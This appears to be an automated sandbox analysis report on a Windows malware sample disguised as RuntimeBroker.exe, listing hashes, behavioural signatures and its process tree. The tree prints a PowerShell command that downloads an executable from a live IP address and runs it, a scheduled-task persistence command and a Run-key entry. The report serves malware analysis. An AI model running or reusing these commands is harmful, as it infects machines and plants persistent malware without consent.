Analysis
-
max time kernel
150s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
26/04/2023, 17:21
Static task
static1
Behavioral task
behavioral1
Sample
RuntimeBroker.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
RuntimeBroker.exe
Resource
win10v2004-20230220-en
General
-
Target
RuntimeBroker.exe
-
Size
87KB
-
MD5
cec35f701961a25e22cdf993089736f6
-
SHA1
c626ccbd15ebeeb4024d1d33d4e1ca0816f4086b
-
SHA256
2d957aea9940b5befacbaf5cfdc72a6d5b14df82691c648efadd7c30a56e905c
-
SHA512
f4e9546fccf3b9e072012ea13c6437b749870e9492f92c4aa7d0a020019957ea85b33e99bbbe7bc4eaf334845bb6a2a83546c9e04242cf3fd884081adb53b042
-
SSDEEP
1536:g7f9h0UPJP/CpICdikMLMLv5PFNg1qrX+VIOlnToIfAgIxldcOQ:eliUPXC8k1nJrX+fNTBf0VQ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 4568 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation SearchIndex.exe -
Executes dropped EXE 2 IoCs
pid Process 348 SearchIndex.exe 2832 RuntimeBroker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ACCC Tools = "C:\\ProgramData\\Runtime\\RuntimeBroker.exe" SearchIndex.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 880 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2588 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2832 RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4568 powershell.exe 4568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 348 SearchIndex.exe Token: SeDebugPrivilege 2832 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4084 wrote to memory of 3784 4084 RuntimeBroker.exe 84 PID 4084 wrote to memory of 3784 4084 RuntimeBroker.exe 84 PID 3784 wrote to memory of 4568 3784 cmd.exe 87 PID 3784 wrote to memory of 4568 3784 cmd.exe 87 PID 3784 wrote to memory of 348 3784 cmd.exe 88 PID 3784 wrote to memory of 348 3784 cmd.exe 88 PID 348 wrote to memory of 880 348 SearchIndex.exe 92 PID 348 wrote to memory of 880 348 SearchIndex.exe 92 PID 348 wrote to memory of 2832 348 SearchIndex.exe 97 PID 348 wrote to memory of 2832 348 SearchIndex.exe 97 PID 348 wrote to memory of 1392 348 SearchIndex.exe 98 PID 348 wrote to memory of 1392 348 SearchIndex.exe 98 PID 1392 wrote to memory of 2588 1392 cmd.exe 100 PID 1392 wrote to memory of 2588 1392 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\89C6.tmp\89D7.tmp\89D8.bat C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'http://85.239.33.24/webserver/Clip/svgchost.exe' -OutFile SearchIndex.exe"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\SearchIndex.exeSearchIndex.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\Runtime\RuntimeBroker.exe" /st 19:27 /du 23:59 /sc daily /ri 1 /f4⤵
- Creates scheduled task(s)
PID:880
-
-
C:\ProgramData\Runtime\RuntimeBroker.exe"C:\ProgramData\Runtime\RuntimeBroker.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF206.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\timeout.exetimeout 75⤵
- Delays execution with timeout.exe
PID:2588
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
635.0MB
MD5cbb1669741d4b8fbc7621bb8f73f964f
SHA170b933a1ec78613ac632f5b06c0c1db63ac42d5c
SHA256ec9f4c6a022bc2f4e216645bbf6fa208cf2babd74bbfcdda7bf48a87c4fcf68d
SHA51293a1f1604c58489d7a853eec4f1d6bcb07bdcd243654552d5355f1bb42d123c0c55ce4a41f55fde8e679c88c2d7e48a7f9cefb8db6cec585d108758cdb59973e
-
Filesize
635.0MB
MD5cbb1669741d4b8fbc7621bb8f73f964f
SHA170b933a1ec78613ac632f5b06c0c1db63ac42d5c
SHA256ec9f4c6a022bc2f4e216645bbf6fa208cf2babd74bbfcdda7bf48a87c4fcf68d
SHA51293a1f1604c58489d7a853eec4f1d6bcb07bdcd243654552d5355f1bb42d123c0c55ce4a41f55fde8e679c88c2d7e48a7f9cefb8db6cec585d108758cdb59973e
-
Filesize
635.0MB
MD5cbb1669741d4b8fbc7621bb8f73f964f
SHA170b933a1ec78613ac632f5b06c0c1db63ac42d5c
SHA256ec9f4c6a022bc2f4e216645bbf6fa208cf2babd74bbfcdda7bf48a87c4fcf68d
SHA51293a1f1604c58489d7a853eec4f1d6bcb07bdcd243654552d5355f1bb42d123c0c55ce4a41f55fde8e679c88c2d7e48a7f9cefb8db6cec585d108758cdb59973e
-
Filesize
1KB
MD55d03f91d8cc4ccfd1f826ed0ddccd818
SHA1af639cc54a2fa1432605cd2eba58050a029b7566
SHA25638599293d61442287f94c4fe3470fe66d8ddaebd1107d033582d102757d8e620
SHA512aebc2dc19dc90015a8763012162daef178e9e4fcbde0f9ab05b2fa82c52a34aa0a5ee826153cfd92622e46eb3a95e485598b6caacd2e4cabf886aa97ead5b34c
-
Filesize
254KB
MD5f2b88c2d583601faecf7dcaea68e273e
SHA1146131ba9e6e379c9d81d477ca121d138f918e0f
SHA25666dd0c455b889256422371ec73eee3b3bd510109ffc58f5c3ee467ab5984db03
SHA51290efa4835bcca0680ef0d7584485f4a96cfd0a5c119990b4a34f59032b8d9076757329c9b0e626b58aa8e1cb508f48186013ef61774151aee2498d0233033a43
-
Filesize
254KB
MD5f2b88c2d583601faecf7dcaea68e273e
SHA1146131ba9e6e379c9d81d477ca121d138f918e0f
SHA25666dd0c455b889256422371ec73eee3b3bd510109ffc58f5c3ee467ab5984db03
SHA51290efa4835bcca0680ef0d7584485f4a96cfd0a5c119990b4a34f59032b8d9076757329c9b0e626b58aa8e1cb508f48186013ef61774151aee2498d0233033a43
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
163B
MD5569b48867d78bec7170dd557cc768377
SHA1c15b059588733aa73565c4b63f92a52839f406b1
SHA2568f7252cc6adec243e685027b4b7cd3eb1eb970de413563e958b3d5a8e6fc228f
SHA51254804189dd460478191955cc1a2facc3edcb31c6fcf2ed7eeacb087f026ef5b1796ba9fcc4d0780c212f577159aeaef4eda284844e76fd0537775aca153cc89d